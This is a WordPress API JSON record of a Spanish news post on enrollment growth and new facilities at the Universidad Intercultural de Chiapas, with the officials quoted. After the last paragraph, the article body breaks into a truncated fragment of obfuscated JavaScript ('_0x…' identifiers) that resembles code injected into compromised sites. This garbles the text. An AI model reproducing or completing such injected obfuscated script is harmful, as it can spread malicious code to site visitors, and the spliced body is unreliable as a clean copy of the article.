{"id":17813,"date":"2024-09-12T02:50:48","date_gmt":"2024-09-12T02:50:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17813"},"modified":"2024-09-12T02:50:49","modified_gmt":"2024-09-12T02:50:49","slug":"unich-ha-elevado-su-matricula-del-2023-al-2025-luciano-concheiro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17813","title":{"rendered":"Unich ha elevado su matr\u00edcula del 2023 al 2025: Luciano Concheiro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2-1024x682.jpeg\" alt=\"\" class=\"wp-image-17814\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-11-at-6.36.07-PM-2.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>11 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Desde el municipio de Las Margaritas, Chiapas, el Subsecretario de Educaci\u00f3n Superior, Luciano Concheiro B\u00f3rquez, revel\u00f3 que la Universidad Intercultural de Chiapas (Unich) ha crecido un 210 por ciento en lo que va del 2023-2024, periodo en el que ha fungido como rector de esta casa de estudios, Dionicio Toledo Hern\u00e1ndez, primer ind\u00edgena tseltal, primer rector de un pueblo originario como lo es Ocosingo.<\/p>\n\n\n\n<p>\u201cEstos n\u00fameros son el trabajo coordinado y de equipo, aqu\u00ed no depende de nadie, puedo agradecer de las gestiones como dice nuestro presidente de la republica, es un encargo, como acad\u00e9mico conoc\u00ed a la interculturalidad, he dirigido tesis de egresados a nivel posgrados, he trabajado conferencias, cursos en la formaci\u00f3n de algunas \u00e1reas, pero en mi funci\u00f3n con encargo, podemos decir que el trabajo colectivo, la comunidad ha sido lo central\u201d, dijo.<\/p>\n\n\n\n<p>Acampado de Mar\u00eda de los \u00c1ngeles Gordillo Casta\u00f1eda, coordinadora t\u00e9cnica de Planeaci\u00f3n y Gesti\u00f3n Administrativa de la Subsecretar\u00eda de Educaci\u00f3n Superior de la SEP, el rector de la Universidad Intercultural de Chiapas (Unich), y Bladimir Hern\u00e1ndez \u00c1lvarez, presidente electo de Las Margaritas, as\u00ed como profesores y docentes de la unidad acad\u00e9mica de ese municipio Tojolabal.<\/p>\n\n\n\n<p>Por su parte, Dionicio Toledo Hern\u00e1ndez, rector de la UNICH, detall\u00f3 que en esta unidad, del Programa Presupuestario U079, Programa de Expansi\u00f3n de la Educaci\u00f3n Media Superior y Superior <a href=\"PROEXES\">Tipo Superior<\/a> Ejercicio Fiscal 2023, se construy\u00f3 un Domo para las actividades y eventos culturales, Aula de usos M\u00faltiples, Tirolesa y la Adecuaci\u00f3n de espacios al aire libre con interconectividad, qu\u00e9 consta de palapas, mesas, bancas que realizan los estudiantes en relaci\u00f3n a los programas educativos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 11 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- Desde el municipio de Las Margaritas, Chiapas, el Subsecretario de Educaci\u00f3n Superior, Luciano Concheiro B\u00f3rquez, revel\u00f3 que la Universidad Intercultural de Chiapas (Unich) ha crecido un 210 por ciento en lo que va del 2023-2024, periodo en el que ha fungido como &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17814,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17813","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17813","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17813"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17813\/revisions"}],"predecessor-version":[{"id":17815,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17813\/revisions\/17815"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17814"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17813"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17813"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17813"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}